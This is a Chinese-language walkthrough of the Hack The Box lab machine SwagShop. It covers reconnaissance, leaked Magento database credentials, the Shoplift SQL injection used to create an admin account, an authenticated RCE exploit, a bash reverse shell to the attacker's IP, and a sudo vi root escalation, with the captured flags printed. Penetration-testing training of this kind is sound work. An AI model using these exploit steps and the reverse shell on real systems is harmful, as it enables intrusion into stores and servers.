HTB SwagShop 渗透测试详细记录
靶机介绍
| 名字 | SwagShop |
|---|---|
| 创建日期 | 11 May 2019 |
| 操作系统 | Linux |
| 难度 | Easy |
1. 初始侦察阶段
Nmap 确定端口开放情况
只开放了80,22端口
└─$ nmap -sT --min-rate 10000 -p- 10.10.10.140
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-18 18:58 CST
Nmap scan report for 10.10.10.140
Host is up (0.31s latency).
Not shown: 65479 filtered tcp ports (no-response), 54 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http2. 服务探测与信息收集
检查端口服务类型,80端口发现域名,swagshop.htb,写入hosts 10.10.10.140 swagshop.htb
nmap -sT -sCV -O -p22,80 10.10.10.140
Nmap scan report for 10.10.10.140
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
| 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Did not follow redirect to http://swagshop.htb/
|_http-server-header: Apache/2.4.29 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.14 seconds
3. 漏洞识别与初始访问
访问目标域名主页
利用 wappalyzer 识别 cms框架为 Magento,数据库为mysql
进行目录爆破,检查是否有版本信息。
feroxbuster -u http://swagshop.htb -x php发现了几个关键的页面
http://swagshop.htb/RELEASE_NOTES.txt 版本日志,版本可能为1.7.0.2
http://swagshop.htb/app/etc/local.xml 关键配置页面,泄漏加密key mysql 登录信息
<key>b355a9e0cd018d3f7f03607141518419</key>
<host>localhost</host>
<username>root</username>
<password>fMVWh7bDHpgZkyfqQXreTjU9</password>
<dbname>swagshop</dbname>
<initStatements>SET NAMES utf8</initStatements>
<model>mysql4</model>
<type>pdo_mysql</type>
<frontName>admin</frontName>但是服务器并没有开放mysl的端口,还需要继续扩大攻击面,尝试搜索 1.7.0.2 版本的漏洞
成功搜索到历史漏洞Magento "Shoplift" (CVE-2015-1397)
poc链接 https://www.exploit-db.com/exploits/37977
未经身份验证的管理员功能调用+模板注入+SQL注入导致可以未授权新建管理员账号
攻击链介绍:
- 攻击者向无保护的
directive端点发送请求 (阶段一)。 - 请求中包含一个指令,告诉 Magento 加载易受攻击的
report_search_gridBlock 并执行其getCsvFile方法。 - 在同一次请求中,攻击者还发送了一个恶意的
filter参数。 getCsvFile方法不安全地将这个恶意filter拼接到它的 SQL 查询中,从而触发了 SQL 注入。
利用poc建立 管理员账号
修改poc中 target = "http://swagshop.htb/"
执行poc
└─$ python2 37977.py
DID NOT WORK这个poc执行失败,说明版本可能不是1.7.0.2(或者说是poc有问题)
tip
把poc的 target_url 修改成如下内容就能正常执行了
target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
└─$ python2 37977.py
WORKED
Check http://swagshop.htb/admin with creds forme:forme我这里用的是另一个poc, https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py
└─$ python2 poc.py 10.10.10.140
WORKED
Check http://10.10.10.140/admin with creds ypwq:123成功获得了管理员权限
这系统竟然还有中文,根据页面,确认版本为1.9
在msf上寻找可供利用的漏洞
└─$ searchsploit magento
------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------- ---------------------------------
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection | php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service) | php/webapps/38651.txt
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cross-Site Scripting | php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email' Cross-Site Scripting | php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting | php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File | php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution | php/webapps/37811.py
Magento eCommerce - Local File Disclosure | php/webapps/19793.txt
Magento eCommerce - Remote Code Execution | xml/webapps/37977.py
Magento eCommerce CE v2.3.5-p2 - Blind SQLi | php/webapps/50896.txt
Magento Server MAGMI Plugin - Multiple Vulnerabilities | php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion | php/webapps/35052.txt
Magento ver. 2.4.6 - XSLT Server Side Injection | multiple/webapps/51847.txt
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass | php/webapps/48135.php
------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results正好 1.9.0.1存在一个经过身份验证的rce漏洞 Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution | php/webapps/37811.py
这个脚本需要在python2 中安装 mechanize 包,这里需要先给python2安装pip,再通过pip安装 mechanize
# 下载专门为 Python 2.7 设计的 pip 安装脚本。
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
# 运行脚本来安装 pip
sudo python2 get-pip.py
# 安装 mechanize
python2 -m pip install mechanize需要修改脚本中的以下字段
# Config.
username = 'mah1ndra'
password = 'mah1ndra'
php_function = 'system' # Note: we can only pass 1 argument to the function
install_date = 'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml经过多次尝试,这个脚本总是执行失败,我从github上重新找了一个优化过的脚本 https://github.com/Hackhoven/Magento-RCE/blob/main/magento-rce-exploit.py
成功命令执行
└─$ python3 Magento-Auth-RCE.py http://swagshop.htb/index.php/admin "uname -a"
Form name: None
Control name: form_key
Control name: login[username]
Control name: dummy
Control name: login[password]
Control name: None
Linux swagshop 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
建立监听
nc -lvnp 8888反弹shell
python3 Magento-Auth-RCE.py http://swagshop.htb/index.php/admin "bash -c 'bash -i >& /dev/tcp/10.10.16.23/8888 0>&1'getshell
listening on [any] 8888 ...
connect to [10.10.16.23] from (UNKNOWN) [10.10.10.140] 47068
bash: cannot set terminal process group (1814): Inappropriate ioctl for device
bash: no job control in this shell
www-data@swagshop:/var/www/html$ ls /home
ls /home
haris
www-data@swagshop:/var/www/html$ cat /home/haris/user.txt
cat /home/haris/user.txt
c962ad22156db6fa8f63f2e652526ac5
www-data@swagshop:/var/www/html$
4. 权限提升
检查sudo 权限
www-data@swagshop:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
利用 vi 提权 https://gtfobins.github.io/gtfobins/vi/#sudo
python3 -c 'import pty;pty.spawn("/bin/bash")'
sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash' /dev/nullgetshell
root@swagshop:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@swagshop:/var/www/html# cat /root/root.txt
cat /root/root.txt
b91bea76eb79eadff7f157337daae0995. 攻击链路图
初始侦察 (Nmap扫描/目录爆破)
↓
Web服务分析 (CMS识别/敏感信息泄漏)
↓
Web服务漏洞利用(未经身份验证的管理员功能调用+模板注入+SQL注入构造攻击链)
↓
新建管理员账号(CVE-2015-1397)
↓
建立立足点,获取www-data权限 (需要身份验证的rce漏洞)
↓
提权至root(sudo vi提权)6. 各阶段关键点总结
- 信息收集阶段:通过 Nmap 扫描识别服务,识别cms寻找历史漏洞poc
- 初始访问阶段:sql注入漏洞增加管理员账号
- 权限提升阶段:利用有身份验证的rce漏洞获取立足点,利用 sudo vi 提权至root。
Comments NOTHING